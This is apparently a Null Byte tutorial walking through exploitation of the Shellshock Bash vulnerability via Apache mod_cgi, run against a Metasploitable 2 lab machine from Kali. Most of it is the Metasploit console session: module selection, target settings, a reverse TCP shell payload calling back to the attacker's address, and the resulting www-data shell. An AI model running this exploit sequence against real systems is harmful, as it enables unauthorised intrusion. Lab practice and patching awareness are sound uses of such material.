One of the most critical bugs to come out in the last five years was Shellshock, a vulnerability which allows attackers to execute arbitrary code via the Unix Bash shell remotely. This vulnerability has been around for a while now, but due to the ubiquity of Unix machines connected to the web, Shellshock is still a very real threat, especially for unpatched systems.
How the Shellshock Vulnerability Works
Shellshock first appeared back in September 2014. There were reports of attacks within hours of the initial disclosure of the vulnerability, and over the next few days, there were millions of attacks and probes coming from botnets.
Bash is a shell, or interpreter, that allows commands to be run on a system, typically via a text window. It usually is the default shell on Unix systems, and as such, can be found on Linux, macOS, and other various Unix flavors. This is why Shellshock is so severe — over half the web servers on the internet are running Unix, not to mention a myriad of IoT devices and even some routers.
Essentially, Shellshock works by allowing an attacker to append commands to function definitions in the values of environment variables. This would be classified as a type of code injection attack, and since Bash will process these commands after the function definition, pretty much any arbitrary code can be executed.
Shellshock is actually an entire family of vulnerabilities consisting of multiple exploitation vectors. In this guide, we will be exploiting the CGI script attack vector, specifically, the mod_cgi module that is part of the Apache HTTP Server.
How Apache & CGI Play into This
Apache is a cross-platform open-source web server developed by the Apache Software Foundation. It is robust with features such as virtual hosting, authentication schemes, SSL and TLS, custom error messages, and multiple programming language support. Apache also has a module called mod_cgi which handles the execution of Common Gateway Interface (CGI) scripts.
CGI is a protocol designed to allow web servers to execute console-like programs directly on the server. These programs, known as CGI scripts, often handle data from dynamic webpages and interact over HTTP. A new directory, typically named cgi-bin or something similar, has to be designated to enable CGI scripts to run. When a browser requests the URL of a specific file contained within the CGI directory, the server runs the script, and the output is passed back to the browser.
When CGI scripts are run, specific information is copied to the environment variables. That information will subsequently be passed to Bash if it is called, thus providing a way for an attacker to inject malicious code. Luckily, the Rapid7 team developed a Metasploit module that makes exploiting this vulnerability very easy.
What You Need for This Walkthrough
Metasploitable 2 is an excellent virtual machine full of vulnerabilities to practice your hacking skills on. I will be attacking that on an isolated network with the faithful Kali Linux. You may want to do the same to make sure you get the same results when first trying this out; then you can move on to pentesting real machines.
Step 1: Configure Target
For this exploit to work, there needs to be an executable script located in the /cgi-bin directory. A simple "Hello world!" Bash script will do for demonstration purposes. Navigate to /usr/lib/cgi-bin on the target machine, and type the following command:
sudo nano hello.sh
Enter the correct password, then make the file look like this:
#! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
Press Ctrl-X, followed by Y, and Enter to save. To make this file executable, use the chmod command:
sudo chmod 755 hello.sh
We can verify this is working correctly by browsing to the file on the web server:
Step 2: Prepare Exploit
On the Kali machine, fire up Metasploit by typing msfconsole in the terminal. We're greeted with a random banner and Metasploit's command prompt:
root@kali:~# msfconsole
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v4.17.3-dev- ]
+ -- --=[ 1795 exploits - 1019 auxiliary - 310 post ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
We can easily search for exploits by using the search command. Type search shellshock, locate the apache_mod_cgi_bash_env_exec module, and copy the location:
msf > search shellshock
[!] Module database cache not built yet, using slow search
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
auxiliary/server/dhclient_bash_env 2014-09-24 normal DHCP Client Bash Environment Variable Code Injection (Shellshock)
exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Advantech Switch Bash Environment Variable Code Injection (Shellshock)
exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent IPFire Bash Environment Variable Injection (Shellshock)
exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent CUPS Filter Bash Environment Variable Code Injection (Shellshock)
exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Legend Perl IRC Bot Remote Code Execution
exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
exploit/osx/local/vmware_bash_function_root 2014-09-24 normal OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
exploit/unix/dhcp/bash_environment 2014-09-24 excellent Dhclient Bash Environment Variable Injection (Shellshock)
exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal Qmail SMTP Bash Environment Variable Injection (Shellshock)
msf >
Load this exploit by typing use followed by the location that we previously copied. Now there should be a longer prompt indicating the module that is currently loaded.
msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
Type options to see the various settings for this module:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Linux x86
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
We can leave most of the defaults, but we'll need to set the remote host to the IP address of the target, and the target URI to the file we placed in the /cgi-bin directory, like so:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/hello.sh
targeturi => /cgi-bin/hello.sh
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
Next, we need to choose a payload. Type show payloads to view different payloads and information regarding each of them:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
linux/x86/chmod normal Linux Chmod
linux/x86/exec normal Linux Execute Command
linux/x86/meterpreter/bind_ipv6_tcp normal Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
linux/x86/meterpreter/bind_ipv6_tcp_uuid normal Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
linux/x86/meterpreter/bind_nonx_tcp normal Linux Mettle x86, Bind TCP Stager
linux/x86/meterpreter/bind_tcp normal Linux Mettle x86, Bind TCP Stager (Linux x86)
linux/x86/meterpreter/bind_tcp_uuid normal Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Mettle x86, Reverse TCP Stager (IPv6)
linux/x86/meterpreter/reverse_nonx_tcp normal Linux Mettle x86, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp normal Linux Mettle x86, Reverse TCP Stager
linux/x86/meterpreter/reverse_tcp_uuid normal Linux Mettle x86, Reverse TCP Stager
linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
linux/x86/read_file normal Linux Read File
linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
linux/x86/shell/bind_ipv6_tcp_uuid normal Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
linux/x86/shell/bind_nonx_tcp normal Linux Command Shell, Bind TCP Stager
linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager (Linux x86)
linux/x86/shell/bind_tcp_uuid normal Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
linux/x86/shell/reverse_nonx_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell/reverse_tcp_uuid normal Linux Command Shell, Reverse TCP Stager
linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
linux/x86/shell_bind_tcp_random_port normal Linux Command Shell, Bind TCP Random Port Inline
linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
linux/x86/shell_reverse_tcp_ipv6 normal Linux Command Shell, Reverse TCP Inline (IPv6)
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
A reverse TCP shell will suffice here, so type set payload linux/x86/shell/reverse_tcp to enable it.
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
Type options again and we can see the current settings for this module including payload information:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 172.16.1.102 yes The target address
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /cgi-bin/hello.sh yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.16.1.100 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux x86
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
Step 3: Get Shell
Some Metasploit modules have a handy little function that will check to see if the target is vulnerable. Type check, and if the module allows it, information about whether the target is vulnerable or not will be displayed.
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > check
[*] 172.16.1.102:80 The target is vulnerable.
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >
We can see that the target is indeed vulnerable, so use the exploit command to launch the attack. A shell session is opened, and we can now run commands like id and whoami to view information about the current user:
msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (36 bytes) to 172.16.1.102
[*] Command shell session 2 opened (172.16.1.100:4444 -> 172.16.1.102:49499) at 2018-07-16 13:55:15 -0500
id
uid=33(www-data) gis=33(www-data) groups=33(www-data)
whoami
www-data
How to Protect Yourself from Shellshock Vulnerabilities
The answer is simple: patch your system. If your system is not yet patched, you have no one to blame but yourself. This vulnerability has been out for years, and pretty much all systems have patches available, so make sure you use them.
Stay Tuned for Escalating Privs
So far, we have learned about Shellshock and the CGI attack vector, used a Metasploit module to exploit this vulnerability, and gained a shell on our target system. But since this is a limited shell, we can only do so much. In the next article, we will use a kernel exploit to escalate privileges and get root.
- Follow Null Byte on Twitter, Flipboard, and YouTube
- Follow WonderHowTo on Facebook, Twitter, Pinterest, and Flipboard
Cover image by Tumisu/Pixabay; Screenshots by drd_/Null Byte
Comments
No Comments Exist
Be the first, drop a comment!